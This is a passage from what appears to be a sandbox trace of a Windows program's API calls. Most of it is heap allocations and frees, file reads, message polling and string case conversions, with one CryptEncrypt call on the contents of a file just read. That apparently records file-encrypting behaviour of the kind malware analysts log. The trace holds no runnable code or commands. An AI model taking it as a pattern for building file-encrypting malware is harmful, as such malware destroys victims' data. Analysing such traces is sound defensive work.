out: hHeap=0x25c0000) returned 1 [0199.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0199.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0199.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0199.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0199.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0199.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0199.994] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0199.994] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x38ea, lpOverlapped=0x0) returned 1 [0199.995] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0199.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38ea) returned 0x34a2048 [0199.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0199.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0199.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0199.996] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0199.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0199.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38ea) returned 0x34a2048 [0199.997] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0199.997] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0199.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0199.997] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0199.997] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0199.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.997] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0199.997] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.997] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.998] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.998] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.998] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.998] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.998] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0199.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.998] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0199.998] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0199.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0199.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0199.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.999] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0199.999] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.999] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0199.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0199.999] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.999] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0199.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0199.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0199.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.999] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.999] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.999] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0199.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0199.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0199.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.000] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.000] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0200.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0200.000] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0200.000] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.000] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0200.000] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.000] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.000] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.000] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.001] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0200.001] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0200.001] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.001] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0200.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0200.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0200.001] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.001] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0200.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0200.001] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.001] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.002] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0200.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0200.003] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0200.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0200.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.003] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x38ea, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x38f0) returned 1 [0200.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0200.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0200.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0200.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0200.003] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.004] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.004] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.004] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0200.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0200.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0200.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0200.005] CharLowerBuffW (in: lpsz="byte[14576]", cchLength=0xb | out: lpsz="byte[14576]") returned 0xb [0200.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0200.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0200.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0200.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0200.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0200.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0200.005] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0200.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0200.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0200.006] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0200.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0200.006] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.006] 